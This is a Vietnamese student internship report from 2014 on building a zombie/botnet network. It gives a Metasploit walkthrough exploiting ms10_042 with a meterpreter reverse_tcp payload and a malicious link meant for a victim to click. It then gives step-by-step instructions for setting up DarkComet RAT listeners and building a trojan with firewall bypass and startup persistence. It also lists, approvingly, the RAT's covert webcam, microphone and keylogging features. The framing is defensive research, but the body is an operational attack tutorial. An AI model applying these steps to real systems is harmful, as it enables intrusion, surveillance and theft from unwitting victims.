Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh
Mạng Quốc Tế Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới
zombie, botnet trên hệ thống mạng
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
- Nguyễn Văn Luân
TP. Hồ Chí Minh, tháng 8 năm 2014
MỤC LỤC
LI M ĐU 2
1. Sự cần thiết ca đ ti 2
2. Mc tiêu nghiên cu 2
3. Phương php nghiên cu 2
4. Kết cu đ ti 2
LỜI CẢM ƠN 4
NHẬN XÉT CỦA GIÁO VIÊN 5
PHN 1 : GIỚI THIỆU VỀ BACKTRACK 5 6
1. Giới thiệu 6
2. Mc đích 6
3. Ci đặt 7
PHN 2: TRIỂN KHAI TRONG MÔI TRƯNG LAN 14
1. Mô phỏng mạng LAN 14
14
2. Thử nghiệm xâm nhập bằng Metasploit 14
PHN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET 18
1. Giới thiệu DarkComet 18
2. Ci đặt DarkComet 18
HƯỚNG PHÁT TRIỂN 35
KẾT LUẬN 36
TÀI LIỆU THAM KHẢO 37
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 2
LI M ĐU
1. Sự cần thiết ca đ ti
Trong cc kiểu tn công hệ thống trên internet, tn công DDoS (Distributed Denial of
Service) l cch tn công đơn giản, hiệu quả v khó phòng chống bậc nht. DDoS l
cch tn công dựa vo việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm
chiếm dng ti nguyên, lm cho hệ thống qu tải, không thể tiếp nhận v phc v cc
yêu cầu từ người dùng thực sự. Ví d điển hình l vo thng 7 năm 2013, hng loạt cc
trang bo điện tử ca Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên
Online bị tn công dẫn đến không thể truy cập được trong nhiu tuần lễ liên tiếp. Theo
thống kê từ Abort Network, đầu năm 2014 có hơn 100 v tn công DDoS trên
100Gbps, 5733 v tn công đạt 20Gbps gp hơn hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đ lớn để đnh sập hệ thống mc tiêu, cc hacker
thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hng triệu my.
Vì vậy, nghiên cu v cch xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu
hơn v cch hoạt động, từ đó xây dựng cc biện php phòng ngừa sự pht triển ca hệ
thống zombie, botnet.
2. Mc tiêu nghiên cu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được cc lỗ hổng bảo mật trên cc
my trong mạng, thử xâm nhập trên cc my.
Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, pht tn v điểu
khiển mạng lưới botnet thông qua mạng Internet.
3. Phương php nghiên cu
Giai đoạn 1: Sử dng ảo hóa VMware để mô phỏng môi trường mạng LAN. Ci đặt
Backtrack trên một my ảo VMware. Sau đó thực hiện thâm nhập từ my Backtrack tới
một mc tiêu.
Giai đoạn 2: Ci đặt v tạo bot trên VPS (Virtual Private Server) v pht tn trên
mạng. Sau đó thực hiện xâm nhập, kiểm sot từ xa thông qua địa chỉ IP public ca
VPS.
4. Kết cu đ ti
Phần 1: Giới thiệu v Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 3
Phần 3: Triển khai xây dựng botnet bằng DarkComet
Kt lun
Qua thời gian học tập và nghiên cu trên ghế nh trường cùng với sự hỗ trợ tận tình ca
Thầy cô, bạn bè v người thân đã giúp em thu thập được nhiu kiến thc quý bo. Đặc biệt
là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng
thú vị và bổ ích. Với mong muốn tìm hiểu v mạng máy tính và góp phần xây dựng một
mạng máy tính thân thiện, thông minh cho mọi người sử dng.
Tuy đã có rt nhiu cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong
được sự thông cảm và những ý kiến đóng góp quý bo từ Quý Thầy Cô, bạn bè, bạn đọc để
chúng em có thể ngày một hoàn thiện đ ti đã chọn một cách tốt hơn nữa. Xin chân thành
cảm ơn
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 4
LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng
những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công
việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ
thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt
quá trình thực tập tại trung tâm Athena.
Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là
sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc
tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công
nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng
em hoàn thành khóa thực tập này.
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy
không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng
góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.
Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng
lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho
thế hệ mai sau.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 5
XÁC NHẬN CỦA CƠ QUAN
THỦ TRƯỞNG
(ký tên, đóng dấu)
NHẬN XÉT CỦA GIÁO VIÊN
… , ngày….tháng….năm 2014
CÁN BỘ HƯỚNG DẪN
(ký tên)
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 6
PHN 1 : GIỚI THIỆU VỀ BACKTRACK 5
1. Giới thiệu
Backtrack l bản phân phối dựa trên GNU/LINUX Debian nhắm mc đích php y kỹ
thuật số v sử dng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ
sự hợp nht ca hai phân phối trước đây l cạnh tranh m tập trung vo thử nghiệm
thâm nhập: WHAX v Auditor Security Collection.
2. Mc đích
Backtrack 5 có cc công c được sử dng cho qu trình thử nghiệm xâm nhập. Cc
công c kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :
1. Information gathering: loại ny có cha một số công c có thể được sử dng
để có được thông tin liên quan đến mc tiêu DNS,định tuyến, địa chỉ
email,trang web,my ch mail…Thông tin ny được thu thập từ cc thông
tin có sẵn trên internet,m không cần chạm vo môi trường mc tiêu.
2. Network mapping: loại ny cha một số công c có thể được sử dng để có
kiểm tra cc host đang tôn tại,thông tin v OS,ng dng được sử dng bởi
mc tiêu,v cũng lm portscanning.
3. Vulnerability identification: Trong thể loại ny, chúng ta có thể tìm thy cc
công c để quét cc lỗ hổng (tổng hợp) v trong cc thiết bị Cisco. Nó cũng
cha cc công c để thực hiện v phân tích Server Message Block (SMB)
và Simple Network Management Protocol (SNMP).
4. Web application analysis: loại ny cha cc công c có thể được sử dng
trong theo dõi, gim st cc ng dng web.
5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth v nhận
dạng tần số vô tuyến (RFID).
6. Penetration: loại ny cha cc công c có thể được sử dng để khai thc cc
lỗ hổng tìm thy trong cc my tính mc tiêu.
7. Privilege escalation: Sau khi khai thc cc lỗ hổng v được truy cập vo cc
my tính mc tiêu, chúng ta có thể sử dng cc công c trong loại ny để
nâng cao đặc quyn ca chúng ta cho cc đặc quyn cao nht.
8. Maintaining access: Công c trong loại ny sẽ có thể giúp chúng ta trong
việc duy trì quyn truy cập vo cc my tính mc tiêu. Chúng ta có thể cần
để có được những đặc quyn cao nht trước khi cc chúng ta có thể ci đặt
công c để duy trì quyn truy cập.
9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dng cc
công c trong thể loại ny.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 7
10. Digital forensics: Trong loại ny, chúng ta có thể tìm thy một số công c
có thể được sử dng để lm phân tích kỹ thuật như có được hình ảnh đĩa
cng, cu trúc cc tập tin, v phân tích hình ảnh đĩa cng. Để sử dng cc
công c cung cp trong thể loại ny, chúng ta có thể chọn Start Backtrack
Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn
kết nội bộ đĩa cng v cc tập tin trao đổi trong chế độ chỉ đọc để bảo tồn
tính ton vẹn.
11. Reverse engineering: Thể loại ny cha cc công c có thể được sử dng để
gỡ rối chương trình một hoặc tho rời một tập tin thực thi.
3. Ci đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
1. Live DVD
Nếu chúng ta muốn sử dng Backtrack mà không cần cài nó vào ổ cng,
chúng ta có thể ghi tập tin ảnh ISO vo đĩa DVD, v khởi động máy tính
ca chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế ca
việc sử dng Backtrack là một DVD Live là nó là rt dễ dàng để làm và
chúng ta không cần phải gây rối với cu hình máy hiện tại ca chúng ta.
Tuy nhiên, phương php ny cũng có một số nhược điểm. Backtrack có thể
không làm việc với phần cng, v thay đổi cu hình no được thực hiện trên
phần cng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoi ra, nó
là chậm, vì máy tính cần phải tải cc chương trình từ đĩa DVD.
2. Install
Ci đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để ci đặt Backtrack. Sau đó chạy
Backtrack Live DVD. Khi gặp màn hình login, ta sử dng username là root,
pass l toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ
họa ca Backtrack 5.
Để ci đặt Backtrack 5 đến đĩa cng ta chọn tập tin có tên install.sh trên
desktop và tiến hnh ci đặt. Tuy nhiên, nếu không thể tìm thy tập tin,
chúng ta có thể sử dng ubiquity để ci đặt. Để sử dng ubiquity, ta mở
Terminal gõ ubiquity. Sau đó cửa sổ ci đặt sẽ hiển thị. Sau đó trả lời 1 số
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 8
câu hỏi như thnh phố chúng ta đang sống, keyboard layout, phân vùng ổ
đĩa ci đặt,… Sau đó tiến hnh ci đặt.
Ci đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và
sử dng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng
được wireless trừ USB wireless.
Ta có thể có thể sử dng file VMWare được cung cp bởi BackTrack. Từ
đây chúng ta có BackTrack trên my ảo thật dễ dàng và nhanh chóng. Cu
hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT.
Để sử dng được card mạng thật, ta phải chọn Netword là Briged
Dưới đây lm một số hình ảnh khi cài BackTrack trên máy ảo VMWare
Tạo một máy ảo mới v cho đia BackTrack vo
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 9
Giao diện khởi động ca BackTrack
Gõ startx để vào chế độ đồ họa trong BackTrack
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 10
Để ci đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 11
Chọn ngôn ngữ, chọn Tiếp để tiếp tc
Chọn múi giờ, chọn Tiếp để tiếp tc
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 12
Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tc
Chọn phân vùng để cài, chọn Tiếp để tiếp tc
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 13
Nhn Ci đặt để bắt đầu cài
Qu trình ci đã bắt đầu.
Sau khi hoàn tt, chúng ta khởi động lại
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 14
PHN 2: TRIỂN KHAI TRONG MÔI TRƯNG
LAN
1. Mô phỏng mạng LAN
Mô hình mạng LAN được mô phỏng:
Để chỉ định máy ảo sử dng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mc Network
Adapter, sau đó trong mc Network Connection, chọn tùy chọn Bridged
2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack5r3, chúng ta sử dng công c Metasploit để thực hiện xâm nhập.
Để khởi động giao diện Console ca Metasploit, trong Terminal, gõ lệnh
msfconsole.
Switch
PC1
PC2
PC3
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 15
Để sử dng một module no đó, chúng ta sử dng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms10_042
Sử dng lệnh search ms10_042 để tìm ra moudle cần dùng
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 16
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.101
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 17
set LHOST 192.168.1.101
exploit
Sau khi exploit, Metasploit sẽ tạo một link cha mã độc (http://192.168.1.101:80/),
chỉ cần nạn nhân click vo link thì mã độc sẽ được gửi sang máy nạn nhân và sau
đó có thể chiếm quyn máy.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 18
PHN 3: XÂY DỰNG BOTNET BẰNG
DARKCOMET
1. Giới thiệu DarkComet
DarkComet l một công c quản trị từ xa (Remote Administrator Tool) miễn phí rt
nổi tiếng, Tuy nhiên mình thy Dark Comet l một soft đơn giản cực kì lợi hại v
nguy hiểm, với cc tính năng như:
+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.
+ Xem cc thư mc ca my victim, ăn cắp ti liệu từ my victim.
+ Có thể tạo, đọc v xóa cc thư mc trong my victim.
+ Xem lén Webcam ca victim.
+ Nghe trộm qua microphone ca victim.
+ Mở website bt kì m không cần sự đồng ý ca victim.
+ Chat với victim (ci ny fê phết, victim còn đíu tắt được cơ)
+ Keylog có thể xem luôn hoặc v email.
+ Xem regedit
+ Có thể sử dung chc năng ctrl + alt + del, Task Manager
+ Download file v chạy bình thường hoặc l ẩn ( Send sang my victim thêm vi
con trojan nữa chẳng hạn)
+ Khởi động cùng win con trojan đó…
Dự án DarkComet RAT đã pht hnh bản chính thc cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
2. Ci đặt DarkComet
Bản darkcomet dùng trong bo co được tải từ:
Chạy DarkComet trên linux:
Tải bản DarkComet v, giải nén vo thư mc darkcomet5.3.1RAT dùng lệnh: unzip
darkcomet5.3.1RAT.
Mở terminal, chuyển thư mc làm việc hiện hành v darkcomet5.3.1RAT.
Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 19
Giao diện quản lí các bot ca DarkComet, chờ đợi các kết nối tới:
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen)
Đin cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Giao diện thêm socket lắng nghe
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 20
Tạo trojan:
Trojan có thể được tạo từ bt kì my windows no. Cc bước tạo trojan:
- Download DarkComet v 531
- Sau đó giải nén file DarkComet531RAT.zip
- Vo thư mc giải nén, chạy file DarkComet.exe
- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c a tro jan theo m ặc đ ịnh (DarkComet ->
Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module->
Full Editor)
Giao diện tùy chọn:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 21
Các cài đặt:
+ Main settings
- Password
- server ID,
- profile name
- tùy chọn bypass tường lửa
+ Network Settings
- Ci đặt IP sẽ lắng nghe các bot và cổng lắng nghe ca server.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 22
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 23
+ Module Startup
Tùy chọn bot có khởi động cùng Windows hay không.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 24
+ Install Message
Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương
trình bot hay không